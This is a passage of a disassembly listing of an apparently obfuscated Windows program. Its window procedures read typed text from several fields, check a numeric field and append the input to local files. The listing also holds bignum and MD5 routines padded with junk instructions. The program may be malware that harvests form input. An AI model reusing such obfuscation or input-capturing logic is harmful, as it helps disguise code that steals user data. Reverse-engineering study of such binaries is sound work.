; ---------------------------------------------------------------------------
loc_40B280: ; CODE XREF: sub_40AA24+89D�j
lea edi, [ebp+var_7C3]
lea esi, byte_446A79
mov ecx, 3
rep movsb
lea eax, [ebp+var_1D]
push eax
call sub_40CA64 ; TranslateMessage
mov eax, dword_446A7C
mov [ebp+var_7C8+1], eax
lea eax, [ebp+var_1D]
push eax
call sub_40CA70 ; DispatchMessageA
loc_40B2B0: ; CODE XREF: sub_40AA24+85A�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_40CA1C ; GetMessageA
or eax, eax
jnz short loc_40B280
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40AA24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2CA proc near ; DATA XREF: sub_408ED0+917�o
; sub_408ED0+94F�o ...
var_14 = dword ptr -14h
var_C = byte ptr -0Ch
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+arg_4]
cmp eax, 100h
jz short loc_40B2EC
jmp short loc_40B35A
; ---------------------------------------------------------------------------
call sub_40C7D0 ; GetVersion
loc_40B2EC: ; CODE XREF: sub_40B2CA+19�j
call sub_40C794 ; GetProcessHeap
cmp [ebp+arg_8], 9
jnz short loc_40B35A
mov eax, dword_446A80
mov [ebp+var_14], eax
cmp ebx, ds:dword_41081C
jnz short loc_40B312
push ds:dword_432DC0
call sub_40C9D4 ; SetFocus
loc_40B312: ; CODE XREF: sub_40B2CA+3B�j
call sub_40C7D0 ; GetVersion
cmp ebx, ds:dword_432DC0
jnz short loc_40B32A
push ds:dword_41E8C4
call sub_40C9D4 ; SetFocus
loc_40B32A: ; CODE XREF: sub_40B2CA+53�j
call sub_40C734 ; GetCurrentProcessId
cmp ebx, ds:dword_41E8C4
jnz short loc_40B342
push ds:dword_41E8BC
call sub_40C9D4 ; SetFocus
loc_40B342: ; CODE XREF: sub_40B2CA+6B�j
cmp ebx, ds:dword_41E8BC
jnz short loc_40B355
push ds:dword_432DC0
call sub_40C9D4 ; SetFocus
loc_40B355: ; CODE XREF: sub_40B2CA+7E�j
call sub_40C794 ; GetProcessHeap
loc_40B35A: ; CODE XREF: sub_40B2CA+1B�j
; sub_40B2CA+2B�j
and [ebp+var_4], 0
cmp ebx, ds:dword_432DC0
jnz short loc_40B36E
mov eax, ds:dword_41F9F4
mov [ebp+var_4], eax
loc_40B36E: ; CODE XREF: sub_40B2CA+9A�j
cmp ebx, ds:dword_41E8C4
jnz short loc_40B37E
mov eax, ds:dword_41E8C0
mov [ebp+var_4], eax
loc_40B37E: ; CODE XREF: sub_40B2CA+AA�j
mov [ebp+var_6], 5304h
sub [ebp+var_6], 7ADBh
cmp ebx, ds:dword_41081C
jnz short loc_40B39A
mov eax, ds:dword_40E078
mov [ebp+var_4], eax
loc_40B39A: ; CODE XREF: sub_40B2CA+C6�j
call sub_40C734 ; GetCurrentProcessId
cmp ebx, ds:dword_41E8BC
jnz short loc_40B3AF
mov eax, ds:dword_413F1C
mov [ebp+var_4], eax
loc_40B3AF: ; CODE XREF: sub_40B2CA+DB�j
lea edi, [ebp+var_C]
lea esi, aPB6 ; "p|b6"
mov ecx, 5
rep movsb
cmp [ebp+var_4], 0
jz short loc_40B3D9
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
push [ebp+var_4]
call sub_40C98C ; CallWindowProcA
jmp short loc_40B3E1
; ---------------------------------------------------------------------------
loc_40B3D9: ; CODE XREF: sub_40B2CA+F9�j
mov [ebp+var_7], 8Bh
add [ebp+var_7], 1
loc_40B3E1: ; CODE XREF: sub_40B2CA+10D�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B2CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3E8 proc near ; DATA XREF: sub_40AA24+4F0�o
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_22F = byte ptr -22Fh
var_130 = byte ptr -130h
var_12B = byte ptr -12Bh
var_126 = word ptr -126h
var_124 = byte ptr -124h
var_121 = dword ptr -121h
var_11D = byte ptr -11Dh
var_11A = byte ptr -11Ah
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 264h
push ebx
push esi
push edi
mov [ebp+var_1], 0C7h
add [ebp+var_1], 1
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_40B5E9
jg short loc_40B418
cmp eax, 2
jz loc_40B5CE
jmp loc_40BC0A
; ---------------------------------------------------------------------------
loc_40B418: ; CODE XREF: sub_40B3E8+20�j
cmp eax, 111h
jz loc_40B709
cmp eax, 113h
jz short loc_40B453
cmp eax, 111h
jl loc_40BC0A
cmp eax, 138h
jz loc_40B605
jmp loc_40BC0A
; ---------------------------------------------------------------------------
mov [ebp+var_104], 0C5h
add [ebp+var_104], 26h
loc_40B453: ; CODE XREF: sub_40B3E8+40�j
mov [ebp+var_108], 4FC7h
inc [ebp+var_108]
cmp dword_43C220, 0
jz loc_40B57B
mov [ebp+var_238], 1930h
add [ebp+var_238], 3C79h
push 9
push offset aRIA ; ""
call sub_40129C
push eax
push dword_43C220
call sub_408E12
mov [ebp+var_23C], eax
call sub_40C734 ; GetCurrentProcessId
push 8
push offset aSmdJJ ; ""
call sub_40129C
push eax
push [ebp+var_23C]
call sub_408E12
add esp, 20h
mov [ebp+var_240], eax
lea eax, [ebp+var_250]
push eax
push [ebp+var_240]
call sub_40C9A4 ; GetWindowRect
or eax, eax
jz loc_40B57B
call sub_40C7C4 ; GetTickCount
lea eax, [ebp+var_260]
push eax
push ds:dword_41FB04
call sub_40C9A4 ; GetWindowRect
or eax, eax
jz short loc_40B57B
call sub_40C7D0 ; GetVersion
mov eax, [ebp+var_248]
sub eax, [ebp+var_250]
sub eax, 4
mov edx, [ebp+var_258]
sub edx, [ebp+var_260]
cmp eax, edx
jnz short loc_40B540
mov eax, [ebp+var_244]
sub eax, [ebp+var_24C]
sub eax, 4
mov edx, [ebp+var_254]
sub edx, [ebp+var_25C]
cmp eax, edx
jz short loc_40B57B
loc_40B540: ; CODE XREF: sub_40B3E8+137�j
call sub_40C7D0 ; GetVersion
push 1
mov eax, [ebp+var_244]
sub eax, [ebp+var_24C]
push eax
mov eax, [ebp+var_248]
sub eax, [ebp+var_250]
push eax
push 0
push 0
push ds:dword_41FB04
call sub_40CAD0 ; MoveWindow
mov eax, off_446A89
mov [ebp+var_264], eax
loc_40B57B: ; CODE XREF: sub_40B3E8+82�j
; sub_40B3E8+F4�j ...
cmp dword_43C21C, 0
jz loc_40BC22
mov [ebp+var_238], 5CFDh
mov eax, [ebp+var_238]
mov edx, eax
add edx, eax
mov [ebp+var_238], edx
mov eax, dword_43C21C
mov dword_43C220, eax
call sub_40C7C4 ; GetTickCount
and dword_43C21C, 0
push dword_43C220
call sub_408ED0
pop ecx
call sub_40C794 ; GetProcessHeap
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40B3E8+25�j
mov eax, ds:dword_41C7BC
cmp [ebp+arg_0], eax
jnz short loc_40B5DF
push 0
call sub_40CAA0 ; PostQuitMessage
loc_40B5DF: ; CODE XREF: sub_40B3E8+1EE�j
call sub_40C794 ; GetProcessHeap
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B5E9: ; CODE XREF: sub_40B3E8+1A�j
mov eax, ds:dword_41C7BC
cmp [ebp+arg_0], eax
jnz short loc_40B5FB
push [ebp+arg_0]
call sub_40CAC4 ; DestroyWindow
loc_40B5FB: ; CODE XREF: sub_40B3E8+209�j
call sub_40C764 ; RtlGetLastWin32Error
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B605: ; CODE XREF: sub_40B3E8+52�j
mov eax, [ebp+arg_C]
mov [ebp+var_114], eax
cmp eax, ds:dword_432DB8
jz short loc_40B642
cmp eax, ds:dword_413F20
jz short loc_40B642
cmp eax, ds:dword_41B7A8
jz short loc_40B642
cmp eax, ds:dword_4351D8
jz short loc_40B642
cmp eax, ds:dword_432DBC
jz short loc_40B642
cmp eax, ds:dword_43A558
jnz loc_40BC22
loc_40B642: ; CODE XREF: sub_40B3E8+22C�j
; sub_40B3E8+234�j ...
mov word ptr [ebp+var_238+2], 75BDh
movzx eax, word ptr [ebp+var_238+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_238+2], ax
mov eax, [ebp+var_114]
cmp eax, ds:dword_432DBC
jz short loc_40B675
cmp eax, ds:dword_43A558
jnz short loc_40B684
loc_40B675: ; CODE XREF: sub_40B3E8+283�j
push 1010B0h
push [ebp+arg_8]
call sub_40CB00 ; SetTextColor
jmp short loc_40B68E
; ---------------------------------------------------------------------------
loc_40B684: ; CODE XREF: sub_40B3E8+28B�j
push 0
push [ebp+arg_8]
call sub_40CB00 ; SetTextColor
loc_40B68E: ; CODE XREF: sub_40B3E8+29A�j
mov word ptr [ebp+var_238], 64CAh
movzx eax, word ptr [ebp+var_238]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_238], ax
push 0FFFFFFh
push [ebp+arg_8]
call sub_40CAF4 ; SetBkColor
mov byte ptr [ebp+var_23C+3], 5Dh
sub byte ptr [ebp+var_23C+3], 0FBh
and [ebp+var_254], 0
and [ebp+var_250], 0
lea eax, [ebp+var_254]
push eax
call sub_40CB0C ; CreateBrushIndirect
mov [ebp+var_240], eax
lea edi, [ebp+var_248]
lea esi, aAhAq ; " *h&q"
movsd
movsd
mov eax, [ebp+var_240]
jmp loc_40BC22
; ---------------------------------------------------------------------------
call sub_40C764 ; RtlGetLastWin32Error
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B709: ; CODE XREF: sub_40B3E8+35�j
lea edi, [ebp+var_11A]
lea esi, aGjvry ; "gjVRy"
mov ecx, 3
rep movsw
push 2
push offset word_446B52
call sub_40129C
push offset byte_433FE0
push eax
lea edi, [ebp+var_22F]
push edi
call sub_40CC50
add esp, 14h
call sub_40C794 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_100]
push eax
push ds:dword_432DC0
call sub_40C998 ; GetWindowTextA
call sub_40C734 ; GetCurrentProcessId
cmp [ebp+var_100], 0
jnz short loc_40B79D
call sub_40C854 ; IsDebuggerPresent
push 1Fh
push offset word_446B32
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40CA10 ; MessageBoxA
push ds:dword_432DC0
call sub_40C9D4 ; SetFocus
call sub_40C794 ; GetProcessHeap
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B79D: ; CODE XREF: sub_40B3E8+37E�j
push 5
push offset dword_446B2C
call sub_40129C
lea edi, [ebp+var_100]
push edi
lea edi, [ebp+var_22F]
push edi
push eax
lea edi, [ebp+var_22F]
push edi
call sub_40CC50
add esp, 18h
push 0FFh
lea eax, [ebp+var_100]
push eax
push ds:dword_41E8C4
call sub_40C998 ; GetWindowTextA
cmp [ebp+var_100], 0
jnz short loc_40B822
call sub_40C7C4 ; GetTickCount
push 1Eh
push offset byte_446B0D
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40CA10 ; MessageBoxA
mov eax, dword_446A9B
mov [ebp+var_238], eax
push ds:dword_41E8C4
call sub_40C9D4 ; SetFocus
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B822: ; CODE XREF: sub_40B3E8+3FD�j
push 5
push offset byte_446B07
call sub_40129C
lea edi, [ebp+var_100]
push edi
lea edi, [ebp+var_22F]
push edi
push eax
lea edi, [ebp+var_22F]
push edi
call sub_40CC50
add esp, 18h
call sub_40C7D0 ; GetVersion
push 0FFh
lea eax, [ebp+var_100]
push eax
push ds:dword_41E8BC
call sub_40C998 ; GetWindowTextA
lea edi, [ebp+var_11D]
lea esi, byte_446A9F
mov ecx, 3
rep movsb
cmp [ebp+var_100], 0
jz loc_40B9B8
mov [ebp+var_10C], 53E8h
add [ebp+var_10C], 3B86h
lea ecx, [ebp+var_100]
or eax, 0FFFFFFFFh
loc_40B8A5: ; CODE XREF: sub_40B3E8+4C2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B8A5
cmp eax, 4
jb loc_40B9B8
call sub_40C764 ; RtlGetLastWin32Error
mov [ebp+var_102], 0
jmp short loc_40B8E5
; ---------------------------------------------------------------------------
loc_40B8C3: ; CODE XREF: sub_40B3E8+516�j
movzx eax, [ebp+var_102]
mov al, [ebp+eax+var_100]
cmp al, 30h
jl short loc_40B8D9
cmp al, 39h
jle short loc_40B8DE
loc_40B8D9: ; CODE XREF: sub_40B3E8+4EB�j
jmp loc_40B9B8
; ---------------------------------------------------------------------------
loc_40B8DE: ; CODE XREF: sub_40B3E8+4EF�j
add [ebp+var_102], 1
loc_40B8E5: ; CODE XREF: sub_40B3E8+4D9�j
lea ecx, [ebp+var_100]
or eax, 0FFFFFFFFh
loc_40B8EE: ; CODE XREF: sub_40B3E8+50B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B8EE
movzx esi, [ebp+var_102]
cmp esi, eax
jb short loc_40B8C3
call sub_40C794 ; GetProcessHeap
mov [ebp+var_101], 0
jmp loc_40B997
; ---------------------------------------------------------------------------
loc_40B911: ; CODE XREF: sub_40B3E8+5C8�j
mov byte ptr [ebp+var_238+2], 0EEh
sub byte ptr [ebp+var_238+2], 96h
call sub_40C764 ; RtlGetLastWin32Error
mov al, [ebp+var_101]
mov byte ptr [ebp+var_238+3], al
jmp short loc_40B95B
; ---------------------------------------------------------------------------
loc_40B932: ; CODE XREF: sub_40B3E8+58C�j
movzx eax, byte ptr [ebp+var_238+3]
movsx eax, [ebp+eax+var_100]
movzx edx, [ebp+var_101]
movsx edx, [ebp+edx+var_100]
cmp eax, edx
jnz short loc_40B976
add byte ptr [ebp+var_238+3], 1
loc_40B95B: ; CODE XREF: sub_40B3E8+548�j
lea ecx, [ebp+var_100]
or eax, 0FFFFFFFFh
loc_40B964: ; CODE XREF: sub_40B3E8+581�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B964
movzx esi, byte ptr [ebp+var_238+3]
cmp esi, eax
jb short loc_40B932
loc_40B976: ; CODE XREF: sub_40B3E8+56A�j
call sub_40C734 ; GetCurrentProcessId
movzx eax, byte ptr [ebp+var_238+3]
movzx edx, [ebp+var_101]
sub eax, edx
cmp eax, 3
jg short loc_40B9B8
add [ebp+var_101], 1
loc_40B997: ; CODE XREF: sub_40B3E8+524�j
lea ecx, [ebp+var_100]
or eax, 0FFFFFFFFh
loc_40B9A0: ; CODE XREF: sub_40B3E8+5BD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B9A0
movzx esi, [ebp+var_101]
cmp esi, eax
jb loc_40B911
jmp short loc_40BA1F
; ---------------------------------------------------------------------------
loc_40B9B8: ; CODE XREF: sub_40B3E8+49A�j
; sub_40B3E8+4C7�j ...
mov eax, dword_43C094
add eax, 7CBh
push eax
call sub_40CBD8
call sub_40C740 ; GetCurrentThreadId
push 35h
push offset byte_446AD1
call sub_40129C
mov [ebp+var_238], eax
push 13h
push offset byte_446ABD
call sub_40129C
add esp, 14h
push 0
push eax
mov edi, [ebp+var_238]
push edi
push 0
call sub_40CA10 ; MessageBoxA
call sub_40C7C4 ; GetTickCount
push ds:dword_41E8BC
call sub_40C9D4 ; SetFocus
mov eax, dword_446AA2
mov [ebp+var_121], eax
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40BA1F: ; CODE XREF: sub_40B3E8+5CE�j
push 5
push offset dword_446B2C
call sub_40129C
lea edi, [ebp+var_100]
push edi
lea edi, [ebp+var_22F]
push edi
push eax
lea edi, [ebp+var_22F]
push edi
call sub_40CC50
add esp, 18h
call sub_40C734 ; GetCurrentProcessId
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_41FA00
call sub_40C8CC ; CreateFileA
mov [ebp+var_110], eax
lea edi, [ebp+var_124]
lea esi, word_446AA6
mov ecx, 3
rep movsb
push 2
push 0
push 0
push [ebp+var_110]
call sub_40C8D8 ; SetFilePointer
call sub_40C7C4 ; GetTickCount
lea ecx, [ebp+var_22F]
or eax, 0FFFFFFFFh
loc_40BA9F: ; CODE XREF: sub_40B3E8+6BC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BA9F
push 0
lea esi, [ebp+var_234]
push esi
push eax
lea edi, [ebp+var_22F]
push edi
push [ebp+var_110]
call sub_40C944 ; WriteFile
mov [ebp+var_103], 87h
movzx eax, [ebp+var_103]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_103], al
push 2
push offset asc_446ABA ; ""
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_234]
push edi
mov edi, 14h
sub edi, dword_43C098
push edi
push eax
push [ebp+var_110]
call sub_40C944 ; WriteFile
mov ax, word_446AA9
mov [ebp+var_126], ax
push [ebp+var_110]
call sub_40C7AC ; CloseHandle
call sub_40C740 ; GetCurrentThreadId
push ds:dword_41FB04
call sub_40CAC4 ; DestroyWindow
call sub_40C854 ; IsDebuggerPresent
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40F1E0
call sub_40C8CC ; CreateFileA
mov [ebp+var_110], eax
push 2
push 0
push 0
push [ebp+var_110]
call sub_40C8D8 ; SetFilePointer
call sub_40C7D0 ; GetVersion
lea ecx, byte_433FE0
or eax, 0FFFFFFFFh
loc_40BB77: ; CODE XREF: sub_40B3E8+794�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BB77
mov edi, eax
push 0
lea esi, [ebp+var_234]
push esi
push edi
push offset byte_433FE0
push [ebp+var_110]
call sub_40C944 ; WriteFile
lea edi, [ebp+var_12B]
lea esi, byte_446AAB
mov ecx, 5
rep movsb
push 1
push offset asc_446AB8 ; ""
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_234]
push edi
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
push [ebp+var_110]
call sub_40C944 ; WriteFile
push [ebp+var_110]
call sub_40C7AC ; CloseHandle
push 5
push ds:dword_41D89C
call sub_40CAAC ; ShowWindow
lea edi, [ebp+var_130]
lea esi, aV@zc ; "v@zc"
mov ecx, 5
rep movsb
jmp short loc_40BC22
; ---------------------------------------------------------------------------
loc_40BC0A: ; CODE XREF: sub_40B3E8+2B�j
; sub_40B3E8+47�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CADC ; DefWindowProcA
jmp short loc_40BC22
; ---------------------------------------------------------------------------
call sub_40C7C4 ; GetTickCount
loc_40BC22: ; CODE XREF: sub_40B3E8+19A�j
; sub_40B3E8+1E1�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B3E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC2C proc near ; CODE XREF: sub_406D2E+32�p
; sub_406D2E+42�p
jmp ds:dword_448340
sub_40BC2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC38 proc near ; CODE XREF: sub_40523D+D4�p
jmp ds:dword_44834C
sub_40BC38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC44 proc near ; CODE XREF: sub_40523D+161�p
jmp ds:dword_448350
sub_40BC44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC50 proc near ; CODE XREF: sub_40696D+5F�p
jmp ds:dword_44835C
sub_40BC50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC5C proc near ; CODE XREF: sub_40696D+39�p
jmp ds:dword_448360
sub_40BC5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC68 proc near ; CODE XREF: sub_40696D+26�p
jmp ds:dword_448364
sub_40BC68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BC74 proc near ; CODE XREF: sub_406911+52�p
jmp ds:dword_448368
sub_40BC74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC80 proc near ; CODE XREF: sub_408741+20�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_447B7C
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40BD4B
xor edx, edx
loc_40BCB0: ; CODE XREF: sub_40BC80+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40BCC2
mov edx, [ebp+arg_4]
call sub_40BCDC
loc_40BCC2: ; CODE XREF: sub_40BC80+38�j
lea edx, dword_447B7C
call sub_40BCDC
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40BCB0
popa
pop ebp
retn 10h
sub_40BC80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BCDC proc near ; CODE XREF: sub_40BC80+3D�p
; sub_40BC80+48�p
lea edi, dword_447B3C
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_447B7C
call sub_40BD4B
loc_40BCF6: ; CODE XREF: sub_40BCDC+5D�j
lea edi, dword_447B3C
mov ecx, 10h
xor eax, eax
loc_40BD03: ; CODE XREF: sub_40BCDC+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40BD03
call sub_40BD5C
bt dword_447B7C, ebx
jnb short loc_40BD38
mov esi, edx
lea edi, dword_447B3C
xor eax, eax
mov ecx, 10h
loc_40BD27: ; CODE XREF: sub_40BCDC+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BD27
call sub_40BD5C
loc_40BD38: ; CODE XREF: sub_40BCDC+3A�j
dec ebx
jns short loc_40BCF6
mov edi, edx
lea esi, dword_447B3C
mov ecx, 10h
rep movsd
retn
sub_40BCDC endp
; =============== S U B R O U T I N E =======================================
sub_40BD4B proc near ; CODE XREF: sub_40BC80+29�p
; sub_40BCDC+15�p
mov ebx, 1FFh
loc_40BD50: ; CODE XREF: sub_40BD4B+B�j
bt [edi], ebx
jb short locret_40BD58
dec ebx
jnz short loc_40BD50
locret_40BD58: ; CODE XREF: sub_40BD4B+8�j
retn
sub_40BD4B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BD5C proc near ; CODE XREF: sub_40BCDC+2E�p
; sub_40BCDC+57�p
lea esi, dword_447B3C
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40BD6A: ; CODE XREF: sub_40BD5C+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40BD93
ja short loc_40BD77
dec ecx
jns short loc_40BD6A
loc_40BD77: ; CODE XREF: sub_40BD5C+16�j
mov esi, [ebp+14h]
lea edi, dword_447B3C
xor eax, eax
mov ecx, 10h
loc_40BD87: ; CODE XREF: sub_40BD5C+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BD87
locret_40BD93: ; CODE XREF: sub_40BD5C+14�j
retn
sub_40BD5C endp
; =============== S U B R O U T I N E =======================================
sub_40BD94 proc near ; CODE XREF: sub_40BDE5+32�p
; sub_40BDE5+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40BD94 endp
; =============== S U B R O U T I N E =======================================
sub_40BDA1 proc near ; CODE XREF: sub_40BDE5+219�p
; sub_40BDE5+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40BDA1 endp
; =============== S U B R O U T I N E =======================================
sub_40BDAE proc near ; CODE XREF: sub_40BDE5+420�p
; sub_40BDE5+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40BDAE endp
; =============== S U B R O U T I N E =======================================
sub_40BDB5 proc near ; CODE XREF: sub_40BDE5+627�p
; sub_40BDE5+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40BDB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDBE proc near ; CODE XREF: sub_408779+A8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40BDBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDE5 proc near ; CODE XREF: sub_408779+C5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_447BBC, eax
mov eax, [edi+4]
mov dword_447BC0, eax
mov eax, [edi+8]
mov dword_447BC4, eax
mov eax, [edi+0Ch]
mov dword_447BC8, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BD94
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BD94
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BD94
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BD94
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BD94
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BD94
add eax, [edi+4]
